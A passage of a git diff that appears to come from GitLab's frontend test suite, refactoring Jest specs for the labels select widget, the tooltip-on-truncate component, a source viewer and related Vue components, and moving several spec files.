'~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view.vue'; import DropdownContentsLabelsView from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view.vue'; -import DropdownHeader from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_header.vue'; import DropdownFooter from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_footer.vue'; import { mockLabels } from './mock_data'; const showDropdown = jest.fn(); +const focusInput = jest.fn(); const GlDropdownStub = { template: ` @@ -25,6 +25,15 @@ const GlDropdownStub = { }, }; +const DropdownHeaderStub = { + template: ` + <div>Hello, I am a header</div> + `, + methods: { + focusInput, + }, +}; + describe('DropdownContent', () => { let wrapper; @@ -52,6 +61,7 @@ describe('DropdownContent', () => { }, stubs: { GlDropdown: GlDropdownStub, + DropdownHeader: DropdownHeaderStub, }, }); }; @@ -62,7 +72,7 @@ 
describe('DropdownContent', () => { const findCreateView = () => wrapper.findComponent(DropdownContentsCreateView); const findLabelsView = () => wrapper.findComponent(DropdownContentsLabelsView); - const findDropdownHeader = () => wrapper.findComponent(DropdownHeader); + const findDropdownHeader = () => wrapper.findComponent(DropdownHeaderStub); const findDropdownFooter = () => wrapper.findComponent(DropdownFooter); const findDropdown = () => wrapper.findComponent(GlDropdownStub); @@ -114,19 +124,7 @@ describe('DropdownContent', () => { expect(wrapper.emitted('setLabels')).toEqual([[[updatedLabel]]]); }); - it('does not render header on standalone variant', () => { - createComponent({ props: { variant: DropdownVariant.Standalone } }); - - expect(findDropdownHeader().exists()).toBe(false); - }); - - it('renders header on embedded variant', () => { - createComponent({ props: { variant: DropdownVariant.Embedded } }); - - expect(findDropdownHeader().exists()).toBe(true); - }); - - it('renders header on sidebar variant', () => { + it('renders header', () => { createComponent(); expect(findDropdownHeader().exists()).toBe(true); @@ -135,11 +133,20 @@ describe('DropdownContent', () => { it('sets searchKey for labels view on input event from header', async () => { createComponent(); - expect(wrapper.vm.searchKey).toEqual(''); + expect(findLabelsView().props('searchKey')).toBe(''); findDropdownHeader().vm.$emit('input', '123'); await nextTick(); - expect(findLabelsView().props('searchKey')).toEqual('123'); + expect(findLabelsView().props('searchKey')).toBe('123'); + }); + + it('clears and focuses search input on selecting a label', () => { + createComponent(); + findDropdownHeader().vm.$emit('input', '123'); + findLabelsView().vm.$emit('input', []); + + expect(findLabelsView().props('searchKey')).toBe(''); + expect(focusInput).toHaveBeenCalled(); }); describe('Create view', () => { diff --git 
a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js index 592559ef305..c4faef8ccdd 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_header_spec.js @@ -9,6 +9,7 @@ describe('DropdownHeader', () => { const createComponent = ({ showDropdownContentsCreateView = false, labelsFetchInProgress = false, + isStandalone = false, } = {}) => { wrapper = extendedWrapper( shallowMount(DropdownHeader, { @@ -18,6 +19,7 @@ describe('DropdownHeader', () => { labelsCreateTitle: 'Create label', labelsListTitle: 'Select label', searchKey: '', + isStandalone, }, stubs: { GlSearchBoxByType, @@ -32,6 +34,7 @@ describe('DropdownHeader', () => { const findSearchInput = () => wrapper.findComponent(GlSearchBoxByType); const findGoBackButton = () => wrapper.findByTestId('go-back-button'); + const findDropdownTitle = () => wrapper.findByTestId('dropdown-header-title'); beforeEach(() => { createComponent(); @@ -72,4 +75,18 @@ describe('DropdownHeader', () => { }, ); }); + + describe('Standalone variant', () => { + beforeEach(() => { + createComponent({ isStandalone: true }); + }); + + it('renders search input', () => { + expect(findSearchInput().exists()).toBe(true); + }); + + it('does not render title', async () => { + expect(findDropdownTitle().exists()).toBe(false); + }); + }); }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js index e7e78cd7a33..0c4f4b7d504 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_value_spec.js @@ -95,5 +95,10 @@ describe('DropdownValue', 
() => { findRegularLabel().vm.$emit('close'); expect(wrapper.emitted('onLabelRemove')).toEqual([[mockRegularLabel.id]]); }); + + it('emits `onCollapsedValueClick` when clicking on collapsed value', () => { + wrapper.find('.sidebar-collapsed-icon').trigger('click'); + expect(wrapper.emitted('onCollapsedValueClick')).toEqual([[]]); + }); }); }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js index d4203528874..a4199bb3e27 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/labels_select_root_spec.js @@ -1,25 +1,34 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import SidebarEditableItem from '~/sidebar/components/sidebar_editable_item.vue'; import DropdownContents from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents.vue'; import DropdownValue from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_value.vue'; import issueLabelsQuery from '~/vue_shared/components/sidebar/labels_select_widget/graphql/issue_labels.query.graphql'; +import updateIssueLabelsMutation from '~/boards/graphql/issue_set_labels.mutation.graphql'; +import updateMergeRequestLabelsMutation from '~/sidebar/queries/update_merge_request_labels.mutation.graphql'; +import updateEpicLabelsMutation from 
'~/vue_shared/components/sidebar/labels_select_widget/graphql/epic_update_labels.mutation.graphql'; import LabelsSelectRoot from '~/vue_shared/components/sidebar/labels_select_widget/labels_select_root.vue'; -import { mockConfig, issuableLabelsQueryResponse } from './mock_data'; +import { mockConfig, issuableLabelsQueryResponse, updateLabelsMutationResponse } from './mock_data'; jest.mock('~/flash'); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const successfulQueryHandler = jest.fn().mockResolvedValue(issuableLabelsQueryResponse); +const successfulMutationHandler = jest.fn().mockResolvedValue(updateLabelsMutationResponse); const errorQueryHandler = jest.fn().mockRejectedValue('Houston, we have a problem'); +const updateLabelsMutation = { + [IssuableType.Issue]: updateIssueLabelsMutation, + [IssuableType.MergeRequest]: updateMergeRequestLabelsMutation, + [IssuableType.Epic]: updateEpicLabelsMutation, +}; + describe('LabelsSelectRoot', () => { let wrapper; @@ -30,17 +39,21 @@ describe('LabelsSelectRoot', () => { const createComponent = ({ config = mockConfig, slots = {}, + issuableType = IssuableType.Issue, queryHandler = successfulQueryHandler, + mutationHandler = successfulMutationHandler, } = {}) => { - const mockApollo = createMockApollo([[issueLabelsQuery, queryHandler]]); + const mockApollo = createMockApollo([ + [issueLabelsQuery, queryHandler], + [updateLabelsMutation[issuableType], mutationHandler], + ]); wrapper = shallowMount(LabelsSelectRoot, { slots, apolloProvider: mockApollo, - localVue, propsData: { ...config, - issuableType: IssuableType.Issue, + issuableType, labelCreateType: 'project', workspaceType: 'project', }, @@ -60,9 +73,9 @@ describe('LabelsSelectRoot', () => { wrapper.destroy(); }); - it('renders component with classes `labels-select-wrapper position-relative`', () => { + it('renders component with classes `labels-select-wrapper gl-relative`', () => { createComponent(); - 
expect(wrapper.classes()).toEqual(['labels-select-wrapper', 'position-relative']); + expect(wrapper.classes()).toEqual(['labels-select-wrapper', 'gl-relative']); }); it.each` @@ -130,4 +143,46 @@ describe('LabelsSelectRoot', () => { findDropdownContents().vm.$emit('setLabels', [label]); expect(wrapper.emitted('updateSelectedLabels')).toEqual([[{ labels: [label] }]]); }); + + describe.each` + issuableType + ${IssuableType.Issue} + ${IssuableType.MergeRequest} + ${IssuableType.Epic} + `('when updating labels for $issuableType', ({ issuableType }) => { + const label = { id: 'gid://gitlab/ProjectLabel/2' }; + + it('sets the loading state', async () => { + createComponent({ issuableType }); + await nextTick(); + findDropdownContents().vm.$emit('setLabels', [label]); + await nextTick(); + + expect(findSidebarEditableItem().props('loading')).toBe(true); + }); + + it('updates labels correctly after successful mutation', async () => { + createComponent({ issuableType }); + await nextTick(); + findDropdownContents().vm.$emit('setLabels', [label]); + await waitForPromises(); + + expect(findDropdownValue().props('selectedLabels')).toEqual( + updateLabelsMutationResponse.data.updateIssuableLabels.issuable.labels.nodes, + ); + }); + + it('displays an error if mutation was rejected', async () => { + createComponent({ issuableType, mutationHandler: errorQueryHandler }); + await nextTick(); + findDropdownContents().vm.$emit('setLabels', [label]); + await waitForPromises(); + + expect(createFlash).toHaveBeenCalledWith({ + captureError: true, + error: expect.anything(), + message: 'An error occurred while updating labels.', + }); + }); + }); }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js index 5c5bf5f2187..6ef54ce37ce 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js +++ 
b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/mock_data.js @@ -118,7 +118,9 @@ export const workspaceLabelsQueryResponse = { export const issuableLabelsQueryResponse = { data: { workspace: { + id: 'workspace-1', issuable: { + __typename: 'Issue', id: '1', labels: { nodes: [ @@ -135,3 +137,18 @@ export const issuableLabelsQueryResponse = { }, }, }; + +export const updateLabelsMutationResponse = { + data: { + updateIssuableLabels: { + errors: [], + issuable: { + __typename: 'Issue', + id: '1', + labels: { + nodes: [], + }, + }, + }, + }, +}; diff --git a/spec/frontend/vue_shared/components/source_viewer_spec.js b/spec/frontend/vue_shared/components/source_viewer_spec.js new file mode 100644 index 00000000000..758068379de --- /dev/null +++ b/spec/frontend/vue_shared/components/source_viewer_spec.js @@ -0,0 +1,59 @@ +import hljs from 'highlight.js/lib/core'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import SourceViewer from '~/vue_shared/components/source_viewer.vue'; +import LineNumbers from '~/vue_shared/components/line_numbers.vue'; +import waitForPromises from 'helpers/wait_for_promises'; + +jest.mock('highlight.js/lib/core'); + +describe('Source Viewer component', () => { + let wrapper; + const content = `// Some source code`; + const highlightedContent = `<span data-testid='test-highlighted'>${content}</span>`; + const language = 'javascript'; + + hljs.highlight.mockImplementation(() => ({ value: highlightedContent })); + hljs.highlightAuto.mockImplementation(() => ({ value: highlightedContent })); + + const createComponent = async (props = {}) => { + wrapper = shallowMountExtended(SourceViewer, { propsData: { content, language, ...props } }); + await waitForPromises(); + }; + + const findLineNumbers = () => wrapper.findComponent(LineNumbers); + const findHighlightedContent = () => wrapper.findByTestId('test-highlighted'); + + beforeEach(() => createComponent()); + + afterEach(() => wrapper.destroy()); + + 
describe('highlight.js', () => { + it('registers the language definition', async () => { + const languageDefinition = await import(`highlight.js/lib/languages/${language}`); + + expect(hljs.registerLanguage).toHaveBeenCalledWith(language, languageDefinition.default); + }); + + it('highlights the content', () => { + expect(hljs.highlight).toHaveBeenCalledWith(content, { language }); + }); + + describe('auto-detect enabled', () => { + beforeEach(() => createComponent({ autoDetect: true })); + + it('highlights the content with auto-detection', () => { + expect(hljs.highlightAuto).toHaveBeenCalledWith(content); + }); + }); + }); + + describe('rendering', () => { + it('renders Line Numbers', () => { + expect(findLineNumbers().props('lines')).toBe(1); + }); + + it('renders the highlighted content', () => { + expect(findHighlightedContent().exists()).toBe(true); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/storage_counter/usage_graph_spec.js b/spec/frontend/vue_shared/components/storage_counter/usage_graph_spec.js deleted file mode 100644 index 103eee4b9a8..00000000000 --- a/spec/frontend/vue_shared/components/storage_counter/usage_graph_spec.js +++ /dev/null @@ -1,137 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; -import { numberToHumanSize } from '~/lib/utils/number_utils'; -import UsageGraph from '~/vue_shared/components/storage_counter/usage_graph.vue'; - -let data; -let wrapper; - -function mountComponent({ rootStorageStatistics, limit }) { - wrapper = shallowMount(UsageGraph, { - propsData: { - rootStorageStatistics, - limit, - }, - }); -} -function findStorageTypeUsagesSerialized() { - return wrapper - .findAll('[data-testid="storage-type-usage"]') - .wrappers.map((wp) => wp.element.style.flex); -} - -describe('Storage Counter usage graph component', () => { - beforeEach(() => { - data = { - rootStorageStatistics: { - wikiSize: 5000, - repositorySize: 4000, - packagesSize: 3000, - lfsObjectsSize: 2000, - buildArtifactsSize: 500, - 
pipelineArtifactsSize: 500, - snippetsSize: 2000, - storageSize: 17000, - uploadsSize: 1000, - }, - limit: 2000, - }; - mountComponent(data); - }); - - afterEach(() => { - wrapper.destroy(); - }); - - it('renders the legend in order', () => { - const types = wrapper.findAll('[data-testid="storage-type-legend"]'); - - const { - buildArtifactsSize, - pipelineArtifactsSize, - lfsObjectsSize, - packagesSize, - repositorySize, - wikiSize, - snippetsSize, - uploadsSize, - } = data.rootStorageStatistics; - - expect(types.at(0).text()).toMatchInterpolatedText(`Wikis ${numberToHumanSize(wikiSize)}`); - expect(types.at(1).text()).toMatchInterpolatedText( - `Repositories ${numberToHumanSize(repositorySize)}`, - ); - expect(types.at(2).text()).toMatchInterpolatedText( - `Packages ${numberToHumanSize(packagesSize)}`, - ); - expect(types.at(3).text()).toMatchInterpolatedText( - `LFS Objects ${numberToHumanSize(lfsObjectsSize)}`, - ); - expect(types.at(4).text()).toMatchInterpolatedText( - `Snippets ${numberToHumanSize(snippetsSize)}`, - ); - expect(types.at(5).text()).toMatchInterpolatedText( - `Artifacts ${numberToHumanSize(buildArtifactsSize + pipelineArtifactsSize)}`, - ); - expect(types.at(6).text()).toMatchInterpolatedText(`Uploads ${numberToHumanSize(uploadsSize)}`); - }); - - describe('when storage type is not used', () => { - beforeEach(() => { - data.rootStorageStatistics.wikiSize = 0; - mountComponent(data); - }); - - it('filters the storage type', () => { - expect(wrapper.text()).not.toContain('Wikis'); - }); - }); - - describe('when there is no storage usage', () => { - beforeEach(() => { - data.rootStorageStatistics.storageSize = 0; - mountComponent(data); - }); - - it('it does not render', () => { - expect(wrapper.html()).toEqual(''); - }); - }); - - describe('when limit is 0', () => { - beforeEach(() => { - data.limit = 0; - mountComponent(data); - }); - - it('sets correct flex values', () => { - expect(findStorageTypeUsagesSerialized()).toStrictEqual([ - 
'0.29411764705882354', - '0.23529411764705882', - '0.17647058823529413', - '0.11764705882352941', - '0.11764705882352941', - '0.058823529411764705', - '0.058823529411764705', - ]); - }); - }); - - describe('when storage exceeds limit', () => { - beforeEach(() => { - data.limit = data.rootStorageStatistics.storageSize - 1; - mountComponent(data); - }); - - it('it does render correclty', () => { - expect(findStorageTypeUsagesSerialized()).toStrictEqual([ - '0.29411764705882354', - '0.23529411764705882', - '0.17647058823529413', - '0.11764705882352941', - '0.11764705882352941', - '0.058823529411764705', - '0.058823529411764705', - ]); - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js b/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js index 380b7231acd..9e7e5c1263f 100644 --- a/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js +++ b/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js @@ -1,25 +1,20 @@ import { mount, shallowMount } from '@vue/test-utils'; +import { nextTick } from 'vue'; import { hasHorizontalOverflow } from '~/lib/utils/dom_utils'; -import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate.vue'; +import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate/tooltip_on_truncate.vue'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -const DUMMY_TEXT = 'lorem-ipsum-dolar-sit-amit-consectur-adipiscing-elit-sed-do'; +const MOCK_TITLE = 'lorem-ipsum-dolar-sit-amit-consectur-adipiscing-elit-sed-do'; +const SHORT_TITLE = 'my-text'; -const createChildElement = () => `<a href="#">${DUMMY_TEXT}</a>`; +const createChildElement = () => `<a href="#">${MOCK_TITLE}</a>`; jest.mock('~/lib/utils/dom_utils', () => ({ - hasHorizontalOverflow: jest.fn(() => { + ...jest.requireActual('~/lib/utils/dom_utils'), + hasHorizontalOverflow: jest.fn().mockImplementation(() => { throw new Error('this needs to be mocked'); }), })); 
-jest.mock('@gitlab/ui', () => ({ - GlTooltipDirective: { - bind(el, binding) { - el.classList.add('gl-tooltip'); - el.setAttribute('data-original-title', el.title); - el.dataset.placement = binding.value.placement; - }, - }, -})); describe('TooltipOnTruncate component', () => { let wrapper; @@ -27,15 +22,31 @@ describe('TooltipOnTruncate component', () => { const createComponent = ({ propsData, ...options } = {}) => { wrapper = shallowMount(TooltipOnTruncate, { - attachTo: document.body, propsData: { + title: MOCK_TITLE, ...propsData, }, + slots: { + default: [MOCK_TITLE], + }, + directives: { + GlTooltip: createMockDirective(), + GlResizeObserver: createMockDirective(), + }, ...options, }); }; const createWrappedComponent = ({ propsData, ...options }) => { + const WrappedTooltipOnTruncate = { + ...TooltipOnTruncate, + directives: { + ...TooltipOnTruncate.directives, + GlTooltip: createMockDirective(), + GlResizeObserver: createMockDirective(), + }, + }; + // set a parent around the tested component parent = mount( { @@ -43,74 +54,85 @@ describe('TooltipOnTruncate component', () => { title: { default: '' }, }, template: ` - <TooltipOnTruncate :title="title" truncate-target="child"> - <div>{{title}}</div> - </TooltipOnTruncate> + <TooltipOnTruncate :title="title" truncate-target="child"> + <div>{{title}}</div> + </TooltipOnTruncate> `, components: { - TooltipOnTruncate, + TooltipOnTruncate: WrappedTooltipOnTruncate, }, }, { propsData: { ...propsData }, - attachTo: document.body, ...options, }, ); - wrapper = parent.find(TooltipOnTruncate); + wrapper = parent.find(WrappedTooltipOnTruncate); }; - const hasTooltip = () => wrapper.classes('gl-tooltip'); + const getTooltipValue = () => getBinding(wrapper.element, 'gl-tooltip')?.value; + const resize = async ({ truncate }) => { + hasHorizontalOverflow.mockReturnValueOnce(truncate); + getBinding(wrapper.element, 'gl-resize-observer').value(); + await nextTick(); + }; afterEach(() => { wrapper.destroy(); }); - 
describe('with default target', () => { - it('renders tooltip if truncated', () => { + describe('when truncated', () => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(true); - createComponent({ - propsData: { - title: DUMMY_TEXT, - }, - slots: { - default: [DUMMY_TEXT], - }, - }); + createComponent(); + }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element); - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-original-title')).toEqual(DUMMY_TEXT); - expect(wrapper.attributes('data-placement')).toEqual('top'); + it('renders tooltip', async () => { + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element); + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + placement: 'top', + disabled: false, }); + expect(wrapper.classes('js-show-tooltip')).toBe(true); }); + }); - it('does not render tooltip if normal', () => { + describe('with default target', () => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(false); - createComponent({ - propsData: { - title: DUMMY_TEXT, - }, - slots: { - default: [DUMMY_TEXT], - }, + createComponent(); + }); + + it('does not render tooltip if not truncated', () => { + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element); + expect(getTooltipValue()).toMatchObject({ + disabled: true, }); + expect(wrapper.classes('js-show-tooltip')).toBe(false); + }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element); - expect(hasTooltip()).toBe(false); + it('renders tooltip on resize', async () => { + await resize({ truncate: true }); + + expect(getTooltipValue()).toMatchObject({ + disabled: false, + }); + + await resize({ truncate: false }); + + expect(getTooltipValue()).toMatchObject({ + disabled: true, }); }); }); describe('with child target', () => { - it('renders tooltip if truncated', () => { + it('renders tooltip if 
truncated', async () => { hasHorizontalOverflow.mockReturnValueOnce(true); createComponent({ propsData: { - title: DUMMY_TEXT, truncateTarget: 'child', }, slots: { @@ -118,13 +140,18 @@ describe('TooltipOnTruncate component', () => { }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element.childNodes[0]); - expect(hasTooltip()).toBe(true); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element.childNodes[0]); + + await nextTick(); + + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + placement: 'top', + disabled: false, }); }); - it('does not render tooltip if normal', () => { + it('does not render tooltip if normal', async () => { hasHorizontalOverflow.mockReturnValueOnce(false); createComponent({ propsData: { @@ -135,19 +162,21 @@ describe('TooltipOnTruncate component', () => { }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element.childNodes[0]); - expect(hasTooltip()).toBe(false); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element.childNodes[0]); + + await nextTick(); + + expect(getTooltipValue()).toMatchObject({ + disabled: true, }); }); }); describe('with fn target', () => { - it('renders tooltip if truncated', () => { + it('renders tooltip if truncated', async () => { hasHorizontalOverflow.mockReturnValueOnce(true); createComponent({ propsData: { - title: DUMMY_TEXT, truncateTarget: (el) => el.childNodes[1], }, slots: { @@ -155,93 +184,97 @@ describe('TooltipOnTruncate component', () => { }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element.childNodes[1]); - expect(hasTooltip()).toBe(true); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element.childNodes[1]); + + await nextTick(); + + expect(getTooltipValue()).toMatchObject({ + disabled: false, }); }); }); describe('placement', () => { - 
it('sets data-placement when tooltip is rendered', () => { - const placement = 'bottom'; + it('sets placement when tooltip is rendered', () => { + const mockPlacement = 'bottom'; hasHorizontalOverflow.mockReturnValueOnce(true); createComponent({ propsData: { - placement, - }, - slots: { - default: DUMMY_TEXT, + placement: mockPlacement, }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-placement')).toEqual(placement); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element); + expect(getTooltipValue()).toMatchObject({ + placement: mockPlacement, }); }); }); describe('updates when title and slot content changes', () => { describe('is initialized with a long text', () => { - beforeEach(() => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(true); createWrappedComponent({ - propsData: { title: DUMMY_TEXT }, + propsData: { title: MOCK_TITLE }, }); - return parent.vm.$nextTick(); + await nextTick(); }); it('renders tooltip', () => { - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-original-title')).toEqual(DUMMY_TEXT); - expect(wrapper.attributes('data-placement')).toEqual('top'); + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + placement: 'top', + disabled: false, + }); }); - it('does not render tooltip after updated to a short text', () => { + it('does not render tooltip after updated to a short text', async () => { hasHorizontalOverflow.mockReturnValueOnce(false); parent.setProps({ - title: 'new-text', + title: SHORT_TITLE, }); - return wrapper.vm - .$nextTick() - .then(() => wrapper.vm.$nextTick()) // wait 2 times to get an updated slot - .then(() => { - expect(hasTooltip()).toBe(false); - }); + await nextTick(); + await nextTick(); // wait 2 times to get an updated slot + + expect(getTooltipValue()).toMatchObject({ + title: SHORT_TITLE, + disabled: true, + }); }); }); - describe('is initialized with a short text', () => 
{ - beforeEach(() => { + describe('is initialized with a short text that does not overflow', () => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(false); createWrappedComponent({ - propsData: { title: DUMMY_TEXT }, + propsData: { title: MOCK_TITLE }, }); - return wrapper.vm.$nextTick(); + await nextTick(); }); it('does not render tooltip', () => { - expect(hasTooltip()).toBe(false); + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + disabled: true, + }); }); - it('renders tooltip after text is updated', () => { + it('renders tooltip after text is updated', async () => { hasHorizontalOverflow.mockReturnValueOnce(true); - const newText = 'new-text'; parent.setProps({ - title: newText, + title: SHORT_TITLE, }); - return wrapper.vm - .$nextTick() - .then(() => wrapper.vm.$nextTick()) // wait 2 times to get an updated slot - .then(() => { - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-original-title')).toEqual(newText); - expect(wrapper.attributes('data-placement')).toEqual('top'); - }); + await nextTick(); + await nextTick(); // wait 2 times to get an updated slot + + expect(getTooltipValue()).toMatchObject({ + title: SHORT_TITLE, + disabled: false, + }); }); }); }); diff --git a/spec/frontend/vue_shared/components/user_select_spec.js b/spec/frontend/vue_shared/components/user_select_spec.js index b777ac0a0a4..8994e16e517 100644 --- a/spec/frontend/vue_shared/components/user_select_spec.js +++ b/spec/frontend/vue_shared/components/user_select_spec.js @@ -1,7 +1,7 @@ import { GlSearchBoxByType, GlDropdown } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; import { cloneDeep } from 'lodash'; -import { nextTick } from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -33,8 +33,7 @@ 
const waitForSearch = async () => { await waitForPromises(); }; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); describe('User select dropdown', () => { let wrapper; @@ -62,7 +61,6 @@ describe('User select dropdown', () => { [getIssueParticipantsQuery, participantsQueryHandler], ]); wrapper = shallowMount(UserSelect, { - localVue, apolloProvider: fakeApollo, propsData: { headerText: 'test', diff --git a/spec/frontend/vue_shared/components/vuex_module_provider_spec.js b/spec/frontend/vue_shared/components/vuex_module_provider_spec.js index ebd396bd87c..c136c2054ac 100644 --- a/spec/frontend/vue_shared/components/vuex_module_provider_spec.js +++ b/spec/frontend/vue_shared/components/vuex_module_provider_spec.js @@ -1,4 +1,4 @@ -import { mount, createLocalVue } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; import Vue from 'vue'; import VueApollo from 'vue-apollo'; import VuexModuleProvider from '~/vue_shared/components/vuex_module_provider.vue'; @@ -38,10 +38,9 @@ describe('~/vue_shared/components/vuex_module_provider', () => { it('does not blow up when used with vue-apollo', () => { // See https://github.com/vuejs/vue-apollo/pull/1153 for details - const localVue = createLocalVue(); - localVue.use(VueApollo); + Vue.use(VueApollo); - createComponent({ localVue }); + createComponent(); expect(findProvidedVuexModule()).toBe(TEST_VUEX_MODULE); }); }); diff --git a/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js b/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js index 3fb60c254c9..7738a69a174 100644 --- a/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js +++ b/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js @@ -1,9 +1,8 @@ -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import GlFeatureFlags from '~/vue_shared/gl_feature_flags_plugin'; import glFeatureFlagsMixin from 
'~/vue_shared/mixins/gl_feature_flags_mixin'; -const localVue = createLocalVue(); - describe('GitLab Feature Flags Plugin', () => { beforeEach(() => { window.gon = { @@ -17,7 +16,7 @@ describe('GitLab Feature Flags Plugin', () => { }, }; - localVue.use(GlFeatureFlags); + Vue.use(GlFeatureFlags); }); it('should provide glFeatures to components', () => { @@ -25,7 +24,7 @@ describe('GitLab Feature Flags Plugin', () => { template: `<span></span>`, inject: ['glFeatures'], }; - const wrapper = shallowMount(component, { localVue }); + const wrapper = shallowMount(component); expect(wrapper.vm.glFeatures).toEqual({ aFeature: true, bFeature: false, @@ -39,7 +38,7 @@ describe('GitLab Feature Flags Plugin', () => { template: `<span></span>`, mixins: [glFeatureFlagsMixin()], }; - const wrapper = shallowMount(component, { localVue }); + const wrapper = shallowMount(component); expect(wrapper.vm.glFeatures).toEqual({ aFeature: true, bFeature: false, diff --git a/spec/frontend/issuable_create/components/issuable_create_root_spec.js b/spec/frontend/vue_shared/issuable/create/components/issuable_create_root_spec.js index 675d01ae4af..81362edaf37 100644 --- a/spec/frontend/issuable_create/components/issuable_create_root_spec.js +++ b/spec/frontend/vue_shared/issuable/create/components/issuable_create_root_spec.js @@ -1,7 +1,7 @@ import { mount } from '@vue/test-utils'; -import IssuableCreateRoot from '~/issuable_create/components/issuable_create_root.vue'; -import IssuableForm from '~/issuable_create/components/issuable_form.vue'; +import IssuableCreateRoot from '~/vue_shared/issuable/create/components/issuable_create_root.vue'; +import IssuableForm from '~/vue_shared/issuable/create/components/issuable_form.vue'; const createComponent = ({ descriptionPreviewPath = '/gitlab-org/gitlab-shell/preview_markdown', diff --git a/spec/frontend/issuable_create/components/issuable_form_spec.js b/spec/frontend/vue_shared/issuable/create/components/issuable_form_spec.js index 
